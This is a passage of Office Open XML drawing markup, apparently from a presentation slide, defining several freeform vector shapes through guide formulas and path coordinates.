                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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26" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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3"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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27" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>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28"/>
                  <a:gd name="T41" fmla="*/ 31 w 31"/>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28">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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28" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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6"/>
                  <a:gd name="T64" fmla="*/ 0 h 72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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6" h="72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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29" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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30" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>
                  <a:gd name="T49" fmla="*/ 0 h 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70"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>
                  <a:gd name="T78" fmla="*/ 70 h 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70">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19"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31" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 30"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
